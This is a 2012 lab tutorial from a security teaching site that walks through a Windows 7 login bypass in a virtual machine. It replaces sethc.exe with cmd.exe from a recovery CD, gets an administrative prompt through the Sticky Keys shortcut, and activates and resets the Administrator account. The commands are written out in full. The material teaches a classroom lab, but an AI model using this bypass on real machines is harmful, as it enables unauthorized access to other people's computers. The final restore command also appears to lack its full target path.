(Password Clearing: Lesson 3)

{ Use a Windows Recovery CD to Replace sethc.exe with cmd.exe }

Section 0. Background Information

What is sethc.exe
- sethc.exe is a program that controls some the accessibility options for disabled people to read the login prompt.
- The accessibility option is invoked by clicking in the Windows Password Box and pressing the shift key 5 times.
- From the windows login screen, winlogon.exe launches sethc.exe that provides the aforementioned accessibilities options.
- Consequently, sethc.exe can be compromised, since the winlogin.exe does not exactly check what is launched when pressing the shift key 5 times in the password text box.
Lab Notes
- In this lab we will do the following:
  1. Boot the Windows 7 VM from a Windows 7 Recovery CD
  2. Select the Recovery Option
  3. We will use the recovery cmd prompt to compromise sethc.exe by replacing it with cmd.exe
  4. We implement the exploit by pressing shift 5 times.
  5. We will active and reset the administrative account.
Prerequisites
- Instructions:
  1. Windows 7: Lesson 1: Installing Windows 7
Legal Disclaimer
- As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
- In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
- In addition, this is a teaching website that does not condone malicious behavior of any kind.
- Your are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
- © 2012 No content replication of any kind is allowed without express written permission.

Section 1. Start your Windows 7 VM

Edit Virtual Machine Settings
- Instructions:
  1. Click on Windows 7
  2. Click on Edit virtual machine
Configure CD/DVD (IDE)
- Instructions
  1. Configure CD/DVD (IDE)
  2. Check the Connect at power on checkbox
  3. Click the radio button "Use ISO image file:"
  4. Click the Browse button and Navigate to the location of the windows 7.iso
  5. Click the Okay button
Start Windows 7
- Instructions:
  1. Click on Windows 7
  2. Click on Play virtual machine
Access the Boot Menu
- Instructions
  1. Once you see the below vmware screen, (1) Left Click in the screen and (2) press the <Esc> key.
Boot from CD-ROM Drive
- Instructions
  1. Arrow Down to where CD-ROM Drive is highlighted
  2. Press <Enter>

Section 2. Using the Windows Recovery CD

Press any key to continue
- Instructions
  1. Press <Enter>
Install Windows
- Instructions
  1. Language to install: English
  2. Time and currency format: English (United States)
  3. Keyboard or input method: US
  4. Click Next
Repair Your Computer
- Instructions
  1. Click Repair your computer
System Recover Options
- Instructions
  1. Select the Use recover tools radio button.
  2. Click the Next Button
System Recovery Command Prompt
- Instructions
  1. Click the Command Prompt
Replace sethc.exe with cmd.exe
- Instructions
  1. copy c:\Windows\System32\sethc.exe c:\Windows\System32\sethc.exe.bkp
  2. copy c:\Windows\System32\cmd.exe c:\Windows\System32\sethc.exe
  3. Yes
  4. Click the Restart Button

Section 3. Implement the Accessibility Option

Implement the Accessibility Option
- Instructions
  1. In the password box, Press the Shift Key 5 Times
Do you want to turn on Sticky Keys?
- Instructions:
  1. Click No
Administrative Command Prompt
- Note(FYI):
  - Now you will see an administrative command prompt.
- Instructions:
  1. net user administrator * /active:yes
  2. shutdown -r -t 5 -c "Nice Trick"
Login as Administrator
- Instructions
  1. Click the Administrator account
- Note(FYI)
  - Previously, only Security Student was the active account.
Administrator Password
- Instructions
  1. Provide the password created in (Section 4, Step 3).

Section 4. Proof of Lab

Open A Command Prompt
- Instructions
  1. Click on the Start Button
  2. Type "cmd" in the search box
  3. Click on cmd
Proof of Lab Instructions
- Instructions:
  1. net user administrator
  2. date
  3. Press <Enter>
  4. echo "Your Name"
    - Replace the string "Your Name" with your actual name.
    - e.g., echo "John Gray"
  5. Do a PrtScn
  6. Paste into a word document
  7. Upload to Moodle

Section 5. Post Lab Restore Work

Access Virtual Machine Settings
- Instructions:
  1. Virtual Machine --> Virtual Machine Settings...
Configure CD/DVD (IDE)
- Instructions
  1. Configure CD/DVD (IDE)
  2. Check the Connect at power on checkbox
  3. Click the radio button "Use ISO image file:"
  4. Click the Browse button and Navigate to the location of the windows 7.iso
  5. Click the Okay button
Restart Windows
- Instructions
  1. Click Start Button
  2. Click Restart
Access the Boot Menu
- Instructions
  1. Once you see the below vmware screen, (1) Left Click in the screen and (2) press the <Esc> key.
Boot from CD-ROM Drive
- Instructions
  1. Arrow Down to where CD-ROM Drive is highlighted
  2. Press <Enter>
Press any key to continue
- Instructions
  1. Press <Enter>
Install Windows
- Instructions
  1. Language to install: English
  2. Time and currency format: English (United States)
  3. Keyboard or input method: US
  4. Click Next
Repair Your Computer
- Instructions
  1. Click Repair your computer
System Recover Options
- Instructions
  1. Select the Use recover tools radio button.
  2. Click the Next Button
System Recovery Command Prompt
- Instructions
  1. Click the Command Prompt
Restore sethc.exe
- Instructions
  1. copy c:\Windows\System32\sethc.exe.bkp sethc.exe
  2. Click Restart